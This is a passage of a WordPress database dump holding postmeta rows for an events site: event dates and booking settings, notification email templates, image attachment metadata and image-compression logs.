ec_ticket_variations','a:0:{}'),(179192,268195,'mec_reg_fields_global_inheritance','1'),(179193,268195,'mec_reg_fields','a:0:{}'),(179194,268195,'mec_bfixed_fields','a:0:{}'),(179195,268195,'mec_op','a:0:{}'),(179196,268195,'mec_fields','a:0:{}'),(179197,268195,'mec_event_status','EventScheduled'),(179198,268195,'mec_moved_online_link',''),(179199,268195,'mec_cancelled_reason',''),(179200,268195,'mec_display_cancellation_reason_in_single_page',''),(179201,268195,'boldgrid_hide_page_title','0'),(179202,268195,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(179203,268195,'passster_activate_global_protection',NULL),(179204,268195,'passster_activate_protection',NULL),(179205,268195,'passster_protection_type','password'),(179206,268195,'boldgrid_in_page_containers','1'),(179207,268195,'passster_area_shortcode',''),(179208,268195,'_thumbnail_id','268196'),(179210,268195,'_dp_original','268193'),(179211,268195,'_edit_lock','1679946913:2'),(179212,268195,'_edit_last','2'),(179213,268194,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2023/03/Bench.webp - cannot be optimized, it has an invalid file type'),(179214,268194,'smush-complete',''),(179215,268196,'_wp_attached_file','2023/03/PersonHill.webp'),(179216,268196,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:23:\"2023/03/PersonHill.webp\";s:8:\"filesize\";i:14806;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"PersonHill-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5874;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"PersonHill-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3130;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"PersonHill-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7650;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"PersonHill-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11248;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"PersonHill-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8682;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"PersonHill-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9926;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192670,269143,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192669,269143,'mec_hourly_schedules','a:0:{}'),(192668,269143,'mec_not_in_days',''),(192667,269143,'mec_in_days',''),(192666,269143,'mec_advanced_days','a:0:{}'),(192665,269143,'mec_repeat_end_at_date',''),(192664,269143,'mec_repeat_end_at_occurrences','9'),(192663,269143,'mec_repeat_end',''),(192662,269143,'mec_repeat_interval','1'),(192655,269143,'mec_end_date','2023-10-08'),(192656,269143,'mec_end_time_hour','11'),(192657,269143,'mec_end_time_minutes','30'),(192658,269143,'mec_end_time_ampm','AM'),(192659,269143,'mec_end_day_seconds','41400'),(192660,269143,'mec_repeat_status','0'),(192661,269143,'mec_repeat_type',''),(192652,269143,'mec_start_time_minutes','30'),(192653,269143,'mec_start_time_ampm','AM'),(192654,269143,'mec_start_day_seconds','37800'),(192651,269143,'mec_start_time_hour','10'),(192650,269143,'mec_start_date','2023-10-08'),(192649,269143,'mec_public','1'),(192648,269143,'mec_countdown_method','global'),(192647,269143,'mec_timezone','global'),(192646,269143,'mec_comment',''),(192645,269143,'mec_hide_end_time','0'),(192644,269143,'mec_hide_time','0'),(192643,269143,'one_occurrence','0'),(192642,269143,'mec_allday','0'),(192641,269143,'mec_certain_weekdays','a:0:{}'),(192640,269143,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192627,269143,'mec_color',''),(192628,269143,'mec_location_id','185'),(192629,269143,'mec_dont_show_map','0'),(192630,269143,'mec_organizer_id','1'),(192631,269143,'mec_read_more',''),(192632,269143,'mec_more_info',''),(192633,269143,'mec_more_info_title',''),(192634,269143,'mec_more_info_target','_self'),(192635,269143,'mec_cost',''),(192636,269143,'mec_currency','a:0:{}'),(192637,269143,'mec_additional_organizer_ids','a:0:{}'),(192638,269143,'mec_additional_location_ids','a:0:{}'),(192639,269143,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-08\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-08\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(192626,269140,'_thumbnail_id','269141'),(194834,269323,'mec_location_id','122'),(194835,269323,'mec_dont_show_map','0'),(194836,269323,'mec_organizer_id','1'),(194837,269323,'mec_read_more',''),(194838,269323,'mec_more_info',''),(194839,269323,'mec_more_info_title',''),(194840,269323,'mec_more_info_target','_self'),(194841,269323,'mec_cost',''),(194842,269323,'mec_currency','a:0:{}'),(194843,269323,'mec_additional_organizer_ids','a:0:{}'),(194844,269323,'mec_additional_location_ids','a:0:{}'),(194845,269323,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-26\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-26\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(194865,269323,'mec_end_day_seconds','41400'),(194864,269323,'mec_end_time_ampm','AM'),(194863,269323,'mec_end_time_minutes','30'),(194862,269323,'mec_end_time_hour','11'),(194861,269323,'mec_end_date','2023-11-26'),(194860,269323,'mec_start_day_seconds','37800'),(192533,268966,'_edit_lock','1696272032:2'),(192534,268966,'passster_area_shortcode',''),(194854,269323,'mec_countdown_method','global'),(194855,269323,'mec_public','1'),(194856,269323,'mec_start_date','2023-11-26'),(194857,269323,'mec_start_time_hour','10'),(194858,269323,'mec_start_time_minutes','30'),(194859,269323,'mec_start_time_ampm','AM'),(194852,269323,'mec_comment',''),(194853,269323,'mec_timezone','global'),(192539,269140,'protect_children',''),(192540,269140,'mec_color',''),(192541,269140,'mec_location_id','186'),(192542,269140,'mec_dont_show_map','0'),(192543,269140,'mec_organizer_id','1'),(192544,269140,'mec_read_more',''),(192545,269140,'mec_more_info',''),(192546,269140,'mec_more_info_title',''),(192547,269140,'mec_more_info_target','_self'),(192548,269140,'mec_cost',''),(192549,269140,'mec_currency','a:0:{}'),(192550,269140,'mec_additional_organizer_ids','a:0:{}'),(192551,269140,'mec_additional_location_ids','a:0:{}'),(192552,269140,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-06\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-06\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(192553,269140,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192554,269140,'mec_certain_weekdays','a:0:{}'),(192555,269140,'mec_allday','0'),(192556,269140,'one_occurrence','0'),(192557,269140,'mec_hide_time','0'),(192558,269140,'mec_hide_end_time','0'),(192559,269140,'mec_comment',''),(192560,269140,'mec_timezone','global'),(192561,269140,'mec_countdown_method','global'),(192562,269140,'mec_public','1'),(192563,269140,'mec_start_date','2023-10-06'),(192564,269140,'mec_start_time_hour','10'),(192565,269140,'mec_start_time_minutes','0'),(192566,269140,'mec_start_time_ampm','AM'),(192567,269140,'mec_start_day_seconds','36000'),(192568,269140,'mec_end_date','2023-10-06'),(192569,269140,'mec_end_time_hour','5'),(192570,269140,'mec_end_time_minutes','0'),(192571,269140,'mec_end_time_ampm','PM'),(192572,269140,'mec_end_day_seconds','61200'),(192573,269140,'mec_repeat_status','1'),(192574,269140,'mec_repeat_type','custom_days'),(192575,269140,'mec_repeat_interval','1'),(192576,269140,'mec_repeat_end','never'),(192577,269140,'mec_repeat_end_at_occurrences','9'),(192578,269140,'mec_repeat_end_at_date',''),(192579,269140,'mec_advanced_days','a:0:{}'),(192580,269140,'mec_in_days','2023-10-07:2023-10-07:10-00-AM:05-00-PM,2023-10-08:2023-10-08:10-00-AM:05-00-PM'),(192581,269140,'mec_not_in_days',''),(192582,269140,'mec_hourly_schedules','a:0:{}'),(192583,269140,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192584,269140,'mec_tickets','a:0:{}'),(192585,269140,'mec_fees_global_inheritance','1'),(192586,269140,'mec_fees','a:0:{}'),(192587,269140,'mec_ticket_variations_global_inheritance','1'),(192588,269140,'mec_ticket_variations','a:0:{}'),(192589,269140,'mec_reg_fields_global_inheritance','1'),(192590,269140,'mec_reg_fields','a:0:{}'),(192591,269140,'mec_bfixed_fields','a:0:{}'),(192592,269140,'mec_op','a:0:{}'),(192593,269140,'mec_fields','a:0:{}'),(192594,269140,'mec_event_status','EventScheduled'),(192595,269140,'mec_moved_online_link',''),(192596,269140,'mec_cancelled_reason',''),(192597,269140,'mec_display_cancellation_reason_in_single_page',''),(192598,269140,'boldgrid_hide_page_title','0'),(192599,269140,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(192600,269140,'passster_activate_global_protection',NULL),(192601,269140,'passster_activate_protection',NULL),(192602,269140,'passster_protection_type','password'),(192603,269140,'boldgrid_in_page_containers','1'),(192617,269140,'_dp_original','267696'),(192605,269140,'passster_area_shortcode',''),(192606,269140,'_wp_old_date','2023-01-14'),(192607,269140,'mec_cost_auto_calculate','0'),(192608,269140,'mec_style_per_event','global'),(192609,269140,'mec_trailer_url',''),(192610,269140,'mec_trailer_title',''),(192611,269140,'mec_start_datetime','2023-10-06 10:00 AM'),(192612,269140,'mec_end_datetime','2023-10-06 05:00 PM'),(192613,269140,'mec_sequence','24'),(192614,269140,'mec_event_gallery','a:0:{}'),(192615,269140,'mec_related_events','a:0:{}'),(192616,269140,'mec_banner','a:0:{}'),(192618,269140,'_edit_lock','1696277210:2'),(192619,269141,'_wp_attached_file','2023/10/2023-body-mind-spirit-expo.jpg'),(192620,269141,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:790;s:6:\"height\";i:444;s:4:\"file\";s:38:\"2023/10/2023-body-mind-spirit-expo.jpg\";s:8:\"filesize\";i:162217;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"2023-body-mind-spirit-expo-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30867;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"2023-body-mind-spirit-expo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10356;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"2023-body-mind-spirit-expo-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121924;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:38:\"2023-body-mind-spirit-expo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35822;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:38:\"2023-body-mind-spirit-expo-500x444.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:444;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91889;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:38:\"2023-body-mind-spirit-expo-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61447;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:38:\"2023-body-mind-spirit-expo-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42726;}s:8:\"tileview\";a:5:{s:4:\"file\";s:38:\"2023-body-mind-spirit-expo-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42950;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192621,269140,'_edit_last','2'),(192622,269141,'original-file','2023/10/2023-body-mind-spirit-expo-updraft-pre-smush-original.jpg'),(192623,269141,'smush-complete','1'),(192624,269141,'smush-info','The file was compressed from 158.42 KB to 137.31 KB, saving 13.32 percent, using WP-Optimize'),(192625,269141,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:162217;s:12:\"smushed-size\";i:140602;s:15:\"savings-percent\";d:13.32000000000000028421709430404007434844970703125;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:162217;s:10:\"compressed\";i:140602;}s:6:\"medium\";a:2:{s:8:\"original\";i:30867;s:10:\"compressed\";i:28897;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10356;s:10:\"compressed\";i:10069;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:121924;s:10:\"compressed\";i:112220;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:35822;s:10:\"compressed\";i:33468;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:91889;s:10:\"compressed\";i:85491;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:61447;s:10:\"compressed\";i:57234;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:42726;s:10:\"compressed\";i:40091;}s:8:\"tileview\";a:2:{s:8:\"original\";i:42950;s:10:\"compressed\";i:39840;}}}'),(194846,269323,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194847,269323,'mec_certain_weekdays','a:0:{}'),(194848,269323,'mec_allday','0'),(194849,269323,'one_occurrence','0'),(194850,269323,'mec_hide_time','0'),(194851,269323,'mec_hide_end_time','0'),(194832,269322,'_seq_num','104'),(194833,269323,'mec_color',''),(194830,269322,'_field_649','Thank you!'),(194831,269322,'_form_id','61'),(179290,268196,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2023/03/PersonHill.webp - cannot be optimized, it has an invalid file type'),(179291,268196,'smush-complete',''),(179292,268198,'_wp_attached_file','2023/03/Waterfall.webp'),(179293,268198,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:22:\"2023/03/Waterfall.webp\";s:8:\"filesize\";i:42570;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Waterfall-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15400;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Waterfall-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7038;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"Waterfall-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19368;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"Waterfall-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:31780;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"Waterfall-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:23704;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"Waterfall-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24202;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179294,268198,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2023/03/Waterfall.webp - cannot be optimized, it has an invalid file type'),(179295,268198,'smush-complete',''),(179310,267897,'_wp_old_date','2023-02-06'),(179312,247332,'_wp_old_date','2023-02-06'),(179314,266761,'_wp_old_date','2023-02-06'),(179316,266281,'_wp_old_date','2023-02-06'),(179318,247342,'_wp_old_date','2023-02-06'),(179320,261921,'_wp_old_date','2023-02-06'),(179322,247343,'_wp_old_date','2023-02-06'),(179324,247344,'_wp_old_date','2023-02-06'),(179397,268208,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179398,268208,'mec_tickets','a:0:{}'),(179399,268208,'mec_fees_global_inheritance','1'),(179400,268208,'mec_fees','a:0:{}'),(179401,268208,'mec_ticket_variations_global_inheritance','1'),(179402,268208,'mec_ticket_variations','a:0:{}'),(179403,268208,'mec_reg_fields_global_inheritance','1'),(179404,268208,'mec_reg_fields','a:0:{}'),(179405,268208,'mec_bfixed_fields','a:0:{}'),(179406,268208,'mec_op','a:0:{}'),(179407,268208,'mec_fields','a:0:{}'),(179408,268208,'mec_event_status','EventScheduled'),(179409,268208,'mec_moved_online_link',''),(179410,268208,'mec_cancelled_reason',''),(179411,268208,'mec_display_cancellation_reason_in_single_page',''),(179412,268208,'boldgrid_hide_page_title','0'),(179413,268208,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(179414,268208,'passster_activate_global_protection',NULL),(179415,268208,'passster_activate_protection',NULL),(179416,268208,'passster_protection_type','password'),(179417,268208,'boldgrid_in_page_containers','1'),(179418,268208,'passster_area_shortcode',''),(179419,268208,'_thumbnail_id','268209'),(179421,268208,'_dp_original','268195'),(179422,268208,'_edit_lock','1679103353:15'),(179423,268208,'_edit_last','15'),(179424,268209,'_wp_attached_file','2023/03/EarthDay.webp'),(179425,268209,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:21:\"2023/03/EarthDay.webp\";s:8:\"filesize\";i:20536;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"EarthDay-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8684;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"EarthDay-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6254;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"EarthDay-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15698;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"EarthDay-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18902;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"EarthDay-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14526;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"EarthDay-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19454;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179426,268210,'protect_children',''),(179427,268210,'mec_color',''),(179428,268210,'mec_location_id','131'),(179429,268210,'mec_dont_show_map','0'),(179430,268210,'mec_organizer_id','1'),(179431,268210,'mec_read_more',''),(179432,268210,'mec_more_info',''),(179433,268210,'mec_more_info_title',''),(179434,268210,'mec_more_info_target','_self'),(179435,268210,'mec_cost',''),(179436,268210,'mec_currency','a:0:{}'),(179437,268210,'mec_additional_organizer_ids','a:0:{}'),(179438,268210,'mec_additional_location_ids','a:0:{}'),(179439,268210,'